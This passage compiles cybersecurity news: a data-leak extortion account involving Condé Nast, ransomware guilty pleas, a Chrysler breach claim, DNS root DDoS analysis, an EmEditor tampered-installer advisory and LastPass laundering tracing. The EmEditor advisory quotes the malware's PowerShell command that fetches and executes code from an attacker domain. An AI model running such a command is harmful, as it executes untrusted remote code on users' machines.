WIRED account information for DataBreaches that Lovely showed her on November 27. It shows email address and date registered and last updated among the fields.
It all seemed consistent with what they had claimed.
Despite its vast wealth, Condé Nast lacks a security.txt file, and nowhere on its site does it plainly explain how to report a vulnerability.
Trying to help Condé Nast avoid compromise of what was described to me as a serious vulnerability risking more than 33 million users’ accounts, I reached out to people I know at WIRED. I also reached out to Condé Nast but received no replies from them.
When the “Researcher” Really Is Dishonorable
Weeks of failed attempts to get a response from Condé Nast followed, and Lovely began saying they were getting angry and thinking about leaking a database just to get the firm’s attention. Leaking a database? They had assured me they had only downloaded a few profiles as proof. But now they stated they had downloaded more than 33 million accounts. They wrote:
We downloaded all 33 million user’s information. The data includes email address, name, phone number, physical address, gender, usernames, and more.
The vulnerabilities allow us to
– view the account information of every Condé Nast account
– change any account’s email address and password
They also provided DataBreaches with a list of the JSON files showing the number of user accounts for each publication. Not all publications had all of the types of information.
DataBreaches reached out to Condé Nast again with that information, but again received no reply. A contact at WIRED was able to get the firm’s security team to engage and Lovely eventually told DataBreaches that they had made contact and given the security team information on six vulnerabilities they had found.
Six? How many lies had Lovely told me? Lovely asked me to hold off on reporting until the firm had time to remediate all the vulnerabilities. DataBreaches agreed, for the firm’s sake, but by now had no doubts that Lovely had been dishonest and that she had been “played.”
Eventually, Lovely sent a message that everything had now been remediated. DataBreaches asked, “Did they pay you anything?” And that’s when Lovely answered, “Not yet.” DataBreaches subsequently discovered that they had been leaking data from WIRED on at least two forums, along with a list of all the JSON files they intend to leak. Or perhaps they intend to sell some of the data. Either way, they lied to this blogger to get her help in reaching Condé Nast.
“Regrets, I’ve Had a Few”
At one point when I reached out on LinkedIn seeking a contact at Condé Nast, someone suggested that Lovely wasn’t a researcher but was a cybercriminal and that I was aiding them.
With the clarity of hindsight, he was right in one respect, although I certainly had no indication of that at the outset or even weeks later. But as I replied to him at the time, “I hope I wasn’t helping a cybercriminal, but if Condé Nast found out about a vulnerability that allowed access to 33M accounts, did I harm Condé Nast by reaching out to them, or did I help them?”
I don’t know if Condé Nast verified Lovely’s claims or not about the alleged vulnerabilities. That said, based on what I had been told, I don’t regret my repeated attempts to get their security team to contact Lovely to get information about the alleged vulnerability.
As for “Lovely,” they played me. Condé Nast should never pay them a dime, and neither should anyone else, as their word clearly cannot be trusted.
Update of December 27, 2025: By now, the data leak has started to be picked up on LinkedIn by Alon Gal and on Have I Been Pwned by Troy Hunt. Condé Nast has yet to issue any public statement or respond to this site’s inquiries. As HIBP reports:
In December 2025, 2.3M records of WIRED magazine users allegedly obtained from parent company Condé Nast were published online. The most recent data dated back to the previous September and exposed email addresses and display names, as well as, for a small number of users, their name, phone number, date of birth, gender, and geographic location or full physical address. The WIRED data allegedly represents a subset of Condé Nast brands the hacker also claims to have obtained.
bleepingcomputer.com
By Sergiu Gatlan
December 30, 2025
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
33-year-old Ryan Clifford Goldberg of Watkinsville, Georgia (in federal custody since September 2023), and 28-year-old Kevin Tyler Martin of Roanoke, Texas, who were charged in November, have now pleaded guilty to conspiracy to obstruct commerce by extortion and are set to be sentenced on March 12, 2026, facing up to 20 years in prison each.
Together with a third accomplice, the two BlackCat ransomware affiliates breached the networks of multiple victims across the United States between May 2023 and November 2023, paying a 20% share of ransoms in exchange for access to BlackCat's ransomware and extortion platform.
Goldberg is a former Sygnia incident response manager, and Martin worked at DigitalMint as a ransomware threat negotiator (as did the unnamed co-conspirator).
"These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop," said Assistant Attorney General A. Tysen Duva. "Extortion via the internet victimizes innocent citizens every bit as much as taking money directly out of their pockets."
According to court documents, their alleged victims include a Maryland pharmaceutical company, a California engineering firm, a Tampa medical device manufacturer, a Virginia drone manufacturer, and a California doctor's office.
While their ransom demands ranged from $300,000 to $10 million, prosecutors said the only payment they received was $1.27 million from the Tampa medical device company, after they encrypted its servers and demanded $10 million in May 2023. While other victims also received ransom demands, the indictment does not indicate whether additional payments were made.
As BleepingComputer previously reported, the Justice Department was also investigating a former DigitalMint negotiator in July for allegedly working with ransomware groups. However, the DOJ and FBI did not comment on the investigation, and it is unclear if this case is related to it.
In December 2023, the FBI created a decryption tool after breaching BlackCat's servers to monitor their activities and obtain decryption keys. The FBI also found that the BlackCat operation collected at least $300 million in ransom payments from more than 1,000 victims until September 2023.
In a February 2024 joint advisory, the FBI, CISA, and the Department of Health and Human Services (HHS) also warned that BlackCat affiliates were primarily targeting organizations in the U.S. healthcare sector.
Hackread – Cybersecurity News, Data Breaches, AI, and More
by
Waqas
December 26, 2025
2 minute read
On December 25, while much of the world was observing Christmas, the Everest ransomware group published a new post on its dark web leak site claiming it had breached the systems of Chrysler, an American automaker. The group says it exfiltrated 1,088 GB (over 1 TB) of data, describing it as a full database linked to Chrysler operations.
According to the threat actors, the stolen data spans 2021 through 2025 and includes more than 105 GB of Salesforce-related information. Everest claims the data contains extensive personal and operational records tied to customers, dealers, and internal agents.
Screenshot from the Everest ransomware group’s dark web leak site (Credit: Hackread.com)
Leaked Screenshots and Sample Data Details
Screenshots shared by the group and reviewed for this report appear to show structured databases, internal spreadsheets, directory trees, and CRM exports. Several images display Salesforce records containing customer interaction logs with names, phone numbers, email addresses, physical addresses, vehicle details, recall case notes, and call outcomes such as voicemail, disconnected, wrong number, or callback scheduled.
Related screenshots (Credit: Hackread.com)
The same material also includes agent work logs documenting call attempts, recall coordination steps, appointment handling, and vehicle status updates, such as sold, repaired, or owner not found.
Additional screenshots appear to reference internal file servers and directories labelled with dealer networks, automotive brands, recall programs, FTP paths, and internal tooling. One set of images also suggests the presence of HR or identity-related records, listing employee names, employment status fields such as active or permanently separated, timestamps, and corporate email domains associated with Stellantis.
For your information, Stellantis is a global automaker behind brands such as Jeep, Chrysler, Dodge, and FIAT. The automaker was also a victim of a cyber attack in September 2025.
Samples published by the attackers also include recall case narratives documenting customer conversations, interpreter use, dealership coordination, appointment scheduling, and follow-up actions. These records align with standard automotive recall support and customer service processes and are consistent with the CRM data shown in other samples.
The group has threatened to publish the full dataset once its countdown timer expires, stating that the company still has time to make contact. Everest also announced plans to release audio recordings linked to customer service interactions, further escalating the pressure.
Unconfirmed, Pending Chrysler Response
Ransomware groups increasingly time disclosures around holidays, when incident response capacity is often reduced. At the time of writing, Chrysler has not publicly confirmed the breach or commented on the claims, and independent verification remains limited.
If validated, the alleged exposure would raise significant concerns regarding customer privacy, internal operational security, and third-party platform governance, given the reported scale and sensitivity of the CRM and recall management data involved.
This story is developing.
NETSCOUT netscout.com
by
John Kristoff, Max Resing
on
December 17th, 2025
Executive Summary
The internet is a system of systems. There is no central organizing committee that governs how it is constructed and operated. There are norms and best practices, as well as agreed-upon standards of operation such as what an Internet Protocol (IP) datagram looks like and how it should be interpreted, but even the behaviors of creating and interpreting IP packets can sometimes vary. For these reasons, to identify the core of the internet, and enforce lasting and comprehensive control over it, is not easy. However, there are a handful of internet subsystems people often name as being critical to the proper and safe functioning of the internet. One such subsystem is the Domain Name System (DNS) root servers. Internet disruptions can take many forms, but if the root DNS system were to become unavailable, it would be practically indiscernible from a complete and total internet outage. In practice, the system’s resiliency and caching behavior of resolvers significantly blunts the likelihood of a complete system failure. Nevertheless, the performance and accuracy of this subsystem is of utmost importance.
The root DNS system has come under attack many times throughout history, and in some cases, we have seen some partial disruption. Overall, however, the DNS root server system has remained robust and widely available. Replication and redundancy of root system component parts, along with high levels of operational care, have largely led to the success of the root server system. However, the root system is always under pressure from high-rate packet floods, route hijacking, and physical sabotage. This blog examines some of these pressures from the perspective of distributed denial-of-service (DDoS) attack traffic to which the root server system is subject.
Key Findings
Background
Most internet client communications start with a DNS query. An application maps an abstract but human-readable name to information about that name, such as an IP address. This process is colloquially called DNS resolution, and the DNS root servers literally and figuratively stand at the apex of this hierarchical system. They are the entry point into a distributed database that makes mapping names to IP addresses possible. Technically, the internet could operate without DNS, but in practice it has become an essential part of the communications process. It is safe to say that the DNS is one of the most important subsystems—if not the most important—of them all. The performance and availability of this system is therefore paramount.
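The hierarchy described above can be sketched as a toy lookup: each level of the tree only knows how to delegate one label deeper, which is why every cold-cache resolution begins at the root. This is an illustration of the tree shape only, not real DNS; the zone data and address below are placeholders invented for the example.

```python
# Toy model of iterative DNS resolution (an illustration, not real DNS):
# each level of the hierarchy delegates one label deeper, so every
# cold-cache lookup starts at the root.

ROOT = {
    "com": {                        # delegation to the .com TLD servers
        "example": {                # delegation to example.com's servers
            "www": "93.184.216.34"  # authoritative answer (placeholder address)
        }
    }
}

def resolve(name, zone=ROOT):
    """Walk the hierarchy right-to-left: com -> example -> www."""
    labels = name.rstrip(".").split(".")
    node = zone
    for label in reversed(labels):
        node = node[label]          # each step is one referral down the tree
    return node

print(resolve("www.example.com"))   # -> 93.184.216.34
```

Real resolvers cache each referral, which is why the root is consulted far less often than its position at the apex might suggest.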
DNS servers come under attack all the time, some more than others. An attack involving the DNS is typically one of two types. The first type aims to compromise the integrity of DNS data. This might be done by altering the source of the DNS data itself—by compromising a server and changing zone files, for example. Alternatively, an attacker may try to manipulate a resolution in flight; DNS cache poisoning attacks are a common vector against the resolution process, for instance.
The second type of attack attempts to disrupt the DNS resolution process by taking an authoritative DNS server in the name space hierarchy out of service. This is a classic denial-of-service attack. The nearer a disruption is to the apex of the name space, or the more heavily used the affected zone, the more far-reaching its effects. If the root servers were disrupted, for example, this would ultimately cause problems for practically everyone and everything that uses the DNS.
Fortunately, the DNS root server system has rarely been the target of successful integrity or disruption attacks. That is not to say the DNS root system has not been attacked; this Wikipedia page lists a few high-profile attacks DNS root servers have been subject to.
The root server system is extremely well provisioned and operated. There are 12 root server operators and hundreds of root servers located all over the world. Primarily through the use of BGP anycast, the modern root server system is extraordinarily resilient to denial-of-service packet flooding attacks. However, attack attempts still seem to appear from time to time. In the remainder of this article, we examine some of the attacks the root system is subject to, and with the help of third-party data show how well the system has withstood these onslaughts.
Motivations for DDoS Attacks on DNS Root Servers
The root servers have been subject to a variety of threats, with some degree of success. Due to the extensive redundancy and capacity of the current system, however, disrupting the system with packet flooding–style attacks is not easy. Furthermore, most modern attacks aim to disrupt a specific subset of service on the internet, not the entire internet itself. Although some attackers may seek to cause general mischief or to exert a show of strength, a degraded root server system would just make everything worse for everyone. This is rarely the objective of today’s internet miscreants. In addition, internet defenders everywhere leap into action the larger and more widespread attacks become. An attack against the root system is not just an attack against the 12 root operators and their systems, but against the entire internet, much of which will respond to thwart attempts to disrupt the system.
So, although attacks on the DNS root occur, most of them are rarely noticed by the public or do not have a significant impact. Nonetheless, we do observe elevated rates of traffic toward the root—traffic that might even overwhelm many other organizations and networks. Attacks against the root may be trying to learn incident response time and defenses. They might also be observing the effect attacks have on public monitoring graphs of performance or response latency—if not for the root specifically, perhaps even local and in-transit networks. The root system, being so central to the internet, is exposed to a lot of suspicious and malicious traffic. Much of this otherwise-unwanted traffic may be simply noise, but whatever the reasons, it is often helpful to study what the root sees, because it just may be a harbinger of what any target on the internet might be up against. What can we learn from analyzing attacks on the root? We explore this question in the next section.
Analysis
NETSCOUT’s ATLAS visibility platform provides a tremendous amount of telemetry for DDoS attack events. Figure 1 presents a chronological overview of DDoS events aimed at the root servers. The strongest volumetric attack in the ATLAS dataset targeted the A root server with 21 Gb/s of traffic on August 17, 2025.
Figure 1: Chronological overview of DDoS attack events on DNS root servers as visible in ATLAS threat intelligence datasets. Illustrated are a total of 38 data points. (The dataset observes no attacks on g.root-servers.net.)
ASERT observes a different set of DDoS attack vectors against different root servers. The A root and the M root face numerous DDoS attack vectors. In contrast, the D root and the H through L roots are observed only with total-traffic and Internet Control Message Protocol (ICMP) attack vectors. Often, the ICMP observations are sympathetic to a DDoS attack, meaning that attackers and/or defenders probe systems to gain insights. In theory, each instance (A through M) of the root should be a mirror of the others.
Why might some root server instances be subject to vastly different amounts of traffic? A variety of reasons could explain this discrepancy. For example, some instances may be preferred by resolvers due to historical accident, topological connectivity, or resolver selection strategy. An interesting speculation of why the A root receives more attacks is because it is the first letter of the alphabet—a dull but probable reason. Root operators deploy different numbers of anycast instances, and those instances are distributed unevenly around the world. Because BGP anycast directs queries to the topologically closest anycast instance, some root instances may naturally attract more traffic, including more noise and invalid queries (see Figure 2).
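A minimal simulation of the anycast behavior described above: all instances share one service address, each client is routed to its topologically "closest" instance, and flood traffic from one region therefore mostly loads the instance nearest the attacker. The instance names and distance numbers below are invented for illustration.

```python
# Toy sketch of BGP anycast routing: every instance announces the same
# service address, and each client's traffic lands on its topologically
# closest instance (here "distance" is just a number per client/instance).

INSTANCES = ["frankfurt", "tokyo", "ashburn"]

def nearest_instance(distances):
    """Pick the instance with the lowest 'distance' for one client."""
    return min(distances, key=distances.get)

# Three clients in different regions; an attacker in one region only
# loads the instance closest to it, leaving the others unaffected.
clients = {
    "eu-client":   {"frankfurt": 1, "tokyo": 9, "ashburn": 5},
    "jp-attacker": {"frankfurt": 9, "tokyo": 1, "ashburn": 8},
    "us-client":   {"frankfurt": 5, "tokyo": 9, "ashburn": 1},
}

load = {i: 0 for i in INSTANCES}
for name, dist in clients.items():
    load[nearest_instance(dist)] += 1

print(load)  # each instance absorbs only the traffic from its own region
```

The same locality that spreads legitimate queries out is what confines a regional flood to one instance, which is why per-instance measurements can look so different across operators.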
Figure 2: This percentage overview presents the DDoS attack events observed and reveals how some root servers receive a wider array of DDoS attack vectors.
Discussion
The numerous instances of root servers make it particularly cumbersome to construct a full picture of the traffic that reaches them. Although anycast limits the visibility external institutions have into operational aspects of root server instances, it formidably enhances the resiliency of the DNS root server system—a much-desired characteristic for such a critical building block of the internet. Distributing traffic across instances not only spreads queries out but also isolates sources of DDoS attack traffic to local instances.
Studies over the years have found that a significant share of query traffic to the root servers is illegitimate [Wessel, ISOC]. Despite noise vastly outnumbering useful queries, the steady state of DNS root traffic volumes remains relatively modest compared with other types of services, usually measured in the tens of megabits per second. This is due to the nature of DNS query traffic itself: small, short-lived request/response packets. Long-lived, large data flows don’t occur in the DNS. Furthermore, although the use of DNS over Transmission Control Protocol (TCP) is slowly increasing, TCP-based attacks against the DNS remain relatively rare.
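To see why root traffic volumes stay modest, consider the wire size of a typical query. A minimal sketch of the RFC 1035 query format shows that a lookup for `www.example.com` fits in a 33-byte UDP payload; the response is similarly small, and the whole exchange is over in one round trip.

```python
import struct

def build_query(name, qtype=1, qclass=1, txid=0x1234):
    """Build a minimal DNS query packet (RFC 1035 wire format).

    Header: 16-bit ID, flags (RD set), QDCOUNT=1, three zero counts;
    then the question section: length-prefixed labels, QTYPE, QCLASS.
    """
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, qclass)

packet = build_query("www.example.com")
print(len(packet))  # 33 -- a typical DNS request fits in one small UDP datagram
```

Compare that with a single web page load, which can move megabytes over long-lived TCP connections; the DNS simply has no equivalent of a large flow.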
What lessons can we learn from the resiliency of the DNS root server system? Simplicity, distributed instance placement, operational diversity, the use of anycast, and of course expert technical operators overseeing it all. These attributes may not be easily replicated everywhere, but perhaps some of what works here can be applied to other systems.
Recommendations
Defenders can take lessons from DNS root server operations. In many cases, the techniques involved are engineering choices rather than commercial purchasing decisions. For example, can anycast be used to spread attack traffic across many points and reduce reliance on single points of failure? To detect and mitigate abusive, ever-changing networks of varying size and duration, we recommend the following:
Real-time visibility into volumetric traffic floods and distributed attack patterns. Tools such as NETSCOUT Arbor Sightline can help surface early signs of trouble and trigger flow-specification and remotely triggered black hole (RTBH) defenses to upstream providers.
Proactive mitigation with automated systems such as Arbor Threat Mitigation System (TMS) or Arbor Edge Defense (AED). These can stop both volumetric floods and more-complex, multivector attacks.
Intelligence-driven defense with feeds such as NETSCOUT’s ATLAS Intelligence Feed (AIF). These provide information about context, what’s trending, who’s being targeted, and how actors are evolving.
Staying ahead of threat actors is an ever-changing job and requires a broad view of where these attacks come from, how they operate, and where they could strike next.
EmEditor (Text Editor) emeditor.com
December 22, 2025/in General/by Yutaka Emura
We regret to inform you that we have identified an incident involving the EmEditor official website’s download path (the [Download Now] button), where unauthorized modification by a third party is suspected. During the affected period, the installer downloaded via that button may not have been the legitimate file provided by us (Emurasoft, Inc.).
We sincerely apologize for the concern and inconvenience this may cause. Please review the information below.
Potentially Affected Period
Dec 19, 2025 18:39 – Dec 22, 2025 12:50 (U.S. Pacific Time)
If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe.
Incident Summary (High-Level Cause)
The [Download Now] button normally points to the following URL:
https://support.emeditor.com/en/downloads/latest/installer/64
This URL uses a redirect. However, during the affected period, the redirect settings appear to have been altered by a third party, resulting in downloads being served from the following (incorrect) URL:
https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi
This file was not created by Emurasoft, Inc., and it has already been removed.
As a result, we have confirmed that the downloaded file may be digitally signed not by us, but by another organization named WALSHAM INVESTMENTS LIMITED.
Note: This issue may not be limited to the English page and may affect similar URLs for other languages as well (including Japanese).
emed64_25.4.3.msi
Legitimate file (official)
File name: emed64_25.4.3.msi
Size: 80,376,832 bytes
Digital signature: Emurasoft, Inc.
SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
Suspicious file (possible tampering)
File name: emed64_25.4.3.msi
Size: 80,380,416 bytes
Digital signature: WALSHAM INVESTMENTS LIMITED
You are NOT affected if any of the following apply:
You updated via EmEditor’s Update Checker or through EmEditor’s automatic update
You downloaded directly from download.emeditor.info
Example: https://download.emeditor.info/emed64_25.4.3.msi
You downloaded a file other than emed64_25.4.3.msi
You used the portable version
You used the store app version
You installed/updated using winget
You downloaded the file but did not run/execute it
5-1. How to check the Digital Signature (Windows)
Right-click the file (emed64_25.4.3.msi) and select Properties.
Open the Digital Signatures tab.
Confirm that the signer is Emurasoft, Inc.
If it shows WALSHAM INVESTMENTS LIMITED, the file may be malicious.
If the “Digital Signatures” tab is not shown, the file may be unsigned or the signature may not be recognized. In that case, do not run the file; delete it and follow the guidance below.
5-2. How to check SHA-256 (Windows / PowerShell)
Open PowerShell and run:
Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256
Confirm the output SHA-256 matches:
Legitimate SHA-256:
e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
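For scripted verification, or on systems without PowerShell, the same check can be done in Python. This is a minimal sketch equivalent to the Get-FileHash command above; it streams the file in chunks so the ~80 MB installer is never loaded into memory at once:

```python
import hashlib

# Expected hash of the legitimate installer, from the advisory above.
LEGIT_SHA256 = "e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e"

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Compute the SHA-256 of a file, reading it in 1 MB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def is_legit_installer(path: str) -> bool:
    """True only if the file matches the published legitimate hash."""
    return sha256_of(path) == LEGIT_SHA256
```

A matching hash confirms the file; on a mismatch, follow the recommended actions below rather than running the installer.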
If the signature or SHA-256 does not match (Recommended actions)
If the digital signature is not Emurasoft, Inc. (e.g., it is WALSHAM INVESTMENTS LIMITED) or the SHA-256 does not match, you may have obtained a tampered file (potentially containing malware).
Immediately disconnect the affected computer from the network (wired/wireless)
Run a full malware scan on the system
Depending on the situation, consider refreshing/rebuilding the environment including the OS
Consider the possibility of credential exposure and change passwords used/stored on that device (and enable MFA where possible)
If you are using EmEditor in an organization, we also recommend contacting your internal security team (e.g., CSIRT) and preserving relevant logs where possible.
The suspicious installer has been found to execute the following command:
powershell.exe "irm emeditorjp.com | iex"
This command downloads and executes content from emeditorjp.com.
emeditorjp.com is not a domain managed by Emurasoft, Inc.
Please also note that the tampered installer may still install the legitimate EmEditor program files normally, which could make the issue difficult to notice.
We sincerely apologize again for the inconvenience and concern this may have caused, and we appreciate your understanding and continued support of EmEditor.
trmlabs.com Team | TRM Blog
TRM traced LastPass-linked Bitcoin laundering through mixers to high-risk Russian exchanges, showing how demixing exposes infrastructure reuse and limits mixer anonymity.
Key takeaways
In 2022, hackers breached LastPass, one of the world’s most widely used password managers, exposing backups of roughly 30 million customer vaults — encrypted containers holding users’ most sensitive digital credentials, including crypto private keys and seed phrases.
Although the vaults were encrypted and initially unreadable without each user’s master password, attackers were able to download them in bulk. That created a long-tail risk for more than 25 million users globally: any vault protected by a weak master password could eventually be decrypted offline, turning a single 2022 intrusion into a multi-year window for attackers to quietly crack passwords and drain assets over time.
New waves of wallet drains have surfaced throughout 2024 and 2025, extending the breach’s impact far beyond its initial disclosure. By analyzing a recent cluster of these drains, TRM analysts were able to trace the stolen funds through mixers and ultimately to two high-risk Russian exchanges frequently used by cybercriminals as fiat off-ramps — with one of them receiving LastPass-linked funds as recently as October.
These findings offer a clear on-chain view of how the stolen assets are being moved and monetized, helping illuminate the pathways and infrastructure supporting one of the most consequential credential breaches of the last decade. Based on the totality of on-chain evidence — including repeated interaction with Russia-associated infrastructure, continuity of control across pre-and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps — TRM assesses that the activity is consistent with involvement by Russian cybercriminal actors.
Analysis of these thefts reveals two consistent indicators that point toward possible Russian cybercrime involvement.
First, stolen funds were repeatedly laundered through infrastructure commonly associated with Russian cybercriminal ecosystems, including off-ramps historically used by Russia-based threat actors.
Second, intelligence linked to the wallets interacting with mixers both before and after the mixing and laundering process indicated operational ties to Russia, suggesting continuity of control rather than downstream reuse by unrelated actors.
While definitive attribution of the original intrusion cannot yet be confirmed, these signals, combined with TRM’s ability to demix activity at scale, highlight both the central role of Russian cybercrime infrastructure in monetizing large-scale hacks and the diminishing effectiveness of mixing as a reliable means of obfuscation.
What demixing revealed
TRM identified a consistent on-chain signature across the thefts: stolen Bitcoin keys were imported into the same wallet software, producing shared transaction traits such as SegWit usage and Replace-by-Fee. Non-Bitcoin assets were quickly converted into Bitcoin via instant swap services, after which funds were transferred into single-use addresses and deposited into Wasabi Wallet. Using this pattern, TRM estimates that more than USD 28 million in cryptocurrency was stolen, converted to Bitcoin, and laundered through Wasabi in late 2024 and early 2025.
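The traits described here, SegWit usage and Replace-by-Fee (RBF), are mechanically checkable on-chain. The sketch below is illustrative only, modeling transactions as plain dicts rather than TRM's actual tooling; per BIP 125, a transaction signals opt-in RBF when any input's sequence number is below 0xFFFFFFFE:

```python
RBF_THRESHOLD = 0xFFFFFFFE  # BIP 125: any input sequence below this signals opt-in RBF

def signals_rbf(tx: dict) -> bool:
    """True if any input's nSequence opts the transaction into Replace-by-Fee."""
    return any(inp["sequence"] < RBF_THRESHOLD for inp in tx["inputs"])

def uses_segwit(tx: dict) -> bool:
    """True if any input carries witness data (i.e., spends a SegWit output)."""
    return any(inp.get("witness") for inp in tx["inputs"])

def matches_wallet_fingerprint(tx: dict) -> bool:
    """Flag transactions sharing both traits attributed to the campaign's wallet software."""
    return signals_rbf(tx) and uses_segwit(tx)
```

Neither trait is rare on its own; it is their consistent co-occurrence across thefts that forms a usable fingerprint.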
Rather than attempting to demix individual thefts in isolation, TRM analysts analyzed the activity as a coordinated campaign, identifying clusters of Wasabi deposits and withdrawals over time. Using proprietary demixing techniques, analysts matched the hackers’ deposits to a specific withdrawal cluster whose aggregate value and timing closely aligned with the inflows, an alignment statistically unlikely to be coincidental.
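The value-and-timing alignment described above can be illustrated with a toy matcher. The tolerance and time-window parameters below are hypothetical placeholders, not TRM's actual thresholds:

```python
from datetime import datetime, timedelta

def match_withdrawal_clusters(deposit_total_btc, deposit_end_time, clusters,
                              tolerance=0.02, window_days=14):
    """Return IDs of clusters whose aggregate value is within `tolerance`
    (fractional) of the deposit total and whose earliest withdrawal falls
    within `window_days` after the deposits ended."""
    matches = []
    for c in clusters:
        total = sum(w["amount_btc"] for w in c["withdrawals"])
        start = min(w["time"] for w in c["withdrawals"])
        value_ok = abs(total - deposit_total_btc) <= tolerance * deposit_total_btc
        time_ok = timedelta(0) <= start - deposit_end_time <= timedelta(days=window_days)
        if value_ok and time_ok:
            matches.append(c["id"])
    return matches
```

In practice a match on both dimensions at once, across many deposits, is what makes a coincidental alignment statistically unlikely.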
Blockchain fingerprints observed prior to mixing, combined with intelligence associated with wallets after the mixing process, consistently pointed to Russia-based operational control. The continuity across pre-mix and post-mix stages strengthens confidence that the laundering activity was conducted by actors operating within, or closely tied to, the Russian cybercrime ecosystem.
Early Wasabi withdrawals occurred within days of the initial wallet drains, suggesting that the attackers themselves were responsible for the initial CoinJoin activity. Taken together, these findings demonstrate both the diminishing reliability of mixing as an obfuscation technique and the central role of demixing in revealing the structure and geography of large-scale illicit campaigns.
Russian off-ramps as a reinforcing signal
Analysis of LastPass-linked laundering activity reveals two distinct phases that both converged on Russian exchanges. In an earlier phase following the initial exploitation, stolen funds were routed through the now defunct Cryptomixer.io and off-ramped via Cryptex, a Russia-based exchange sanctioned by OFAC in 2024. In a subsequent wave identified in September 2025, TRM analysts traced approximately USD 7 million in additional stolen funds through Wasabi Wallet, with withdrawals ultimately flowing to Audi6, another Russian exchange associated with cybercriminal activity.
Applying the same demixing methodology across both periods, TRM identified consistent laundering patterns, including clustered withdrawals and peeling chains that funneled mixed Bitcoin into these exchanges. The repeated use of Russian exchanges at the off-ramp stage, combined with intelligence indicating Russia-based operational control both before and after mixing, suggests continuity in the laundering infrastructure rather than isolated or opportunistic usage. Together, these findings point to alignment with a persistent Russian cybercriminal ecosystem across multiple phases of the LastPass-related activity.
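A peeling chain repeatedly splits a balance into a small "peel" (often an exchange deposit) and a larger change output that funds the next hop. A simplified follower, assuming a convenient index from funding txid to the spending transaction and the classic two-output pattern:

```python
def follow_peel_chain(txs_by_input, start_txid, max_hops=100):
    """Walk a peeling chain: at each hop the larger output is treated as
    change funding the next transaction; the smaller output is the 'peel'.
    `txs_by_input` maps a funding txid to the transaction that spends it."""
    peels, txid, hops = [], start_txid, 0
    while txid in txs_by_input and hops < max_hops:
        tx = txs_by_input[txid]
        outs = sorted(tx["outputs"], key=lambda o: o["value"])
        if len(outs) != 2:          # classic peel chains have exactly two outputs
            break
        peels.append(outs[0])       # smaller output: the peel (e.g., an exchange deposit)
        txid = tx["txid"]           # the larger output's spend continues the chain
        hops += 1
    return peels
```

Collecting the peel addresses and checking them against known exchange deposit clusters is what surfaces off-ramps like the ones described above.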
Why the Russian connection matters
The significance of likely Russian involvement extends beyond this single case. Russian high-risk exchanges and laundering services have repeatedly served as critical off-ramps for globally dispersed ransomware groups, sanctions evaders, and other cybercriminal networks. Their role in the LastPass laundering pipeline underscores how Russia-based financial infrastructure continues to function as a systemic enabler of global cybercrime, even as enforcement pressure increases elsewhere.
This case also highlights how mixers do not eliminate attribution risk when threat actors rely on consistent infrastructure and geographic ecosystems over time. Demixing allowed TRM to move beyond individual transactions and reveal the broader operational architecture, including where illicit value ultimately converges.
Frequently asked questions (FAQs)
What happened in the LastPass breach?
In 2022, a threat actor gained access to encrypted vault data stored by LastPass. As users failed to rotate passwords or improve vault security, attackers continued to crack weak master passwords years later — leading to wallet drains as recently as late 2025.
Why is Russian involvement suspected?
TRM observed two consistent signals:
Pre and post-mix wallet intelligence pointed to the same operator using Russian infrastructure.
Off-ramps included multiple Russia-based exchanges, including one previously sanctioned for facilitating ransomware laundering.
TRM’s demixing linked pre- and post-mix activity by matching:
Behavioral patterns (e.g. wallet software traits, transaction formatting)
Timing and amounts
Destination addresses with known ties to illicit ecosystems
This enabled linkage across waves of theft and over time — exposing centralized laundering control.
Across both waves, TRM traced:
USD 28 million demixed from 2024–early 2025 flows
USD 7 million from a September 2025 wave linked to additional Wasabi usage
Why is this still happening three years later?
Many affected LastPass users failed to change or secure master passwords, and their vaults still contained private keys. As threat actors brute-force vaults over time, slow-drip wallet draining has become a recurring pattern.
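A back-of-envelope estimate shows why weak master passwords fall over time while strong ones hold. The guess rate and password keyspaces below are illustrative assumptions, not figures from TRM or LastPass:

```python
def crack_time_days(keyspace: int, guesses_per_second: float) -> float:
    """Days needed to exhaust a password keyspace at a given offline guess rate."""
    return keyspace / guesses_per_second / 86_400

# Illustrative: an 8-character all-lowercase master password.
weak_keyspace = 26 ** 8                   # ~2.1e11 candidates
# Illustrative GPU-rig rate against a slow key-derivation function.
rate = 1e5                                # guesses per second
weak_days = crack_time_days(weak_keyspace, rate)      # roughly 24 days

# Adding length and character classes blows the keyspace up exponentially.
strong_keyspace = 62 ** 12                # 12 chars, mixed case + digits
strong_days = crack_time_days(strong_keyspace, rate)  # hundreds of billions of days
```

Because the stolen vaults can be attacked offline indefinitely, even a multi-week cracking effort per weak vault remains economical for attackers, which is exactly the slow-drip pattern described above.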
What makes this case important?
This is a clear example of how:
Mixers don't provide true anonymity when infrastructure is reused
Off-ramp infrastructure remains the best attribution signal
Illicit networks adapt, but don’t disappear — when one service is sanctioned, another emerges
newsguardrealitycheck.com
By Eva Maitland and Alice Lee
400 and Counting: A Russian Influence Operation Overtakes Official State Media in Spreading Russia-Ukraine False Claims
As Ukraine faces battlefield struggles, an ongoing corruption probe, and pressure from the U.S., the Storm-1516 Russian disinformation operation is becoming more prolific and harmful, an analysis of NewsGuard’s database of more than 400 false claims about the war shows.
NewsGuard has now debunked 400 false claims about the Russia-Ukraine war pushed by Russia, and an analysis of our database shows that in 2025, Russian influence operations surpassed official state media as the biggest source of these narratives.
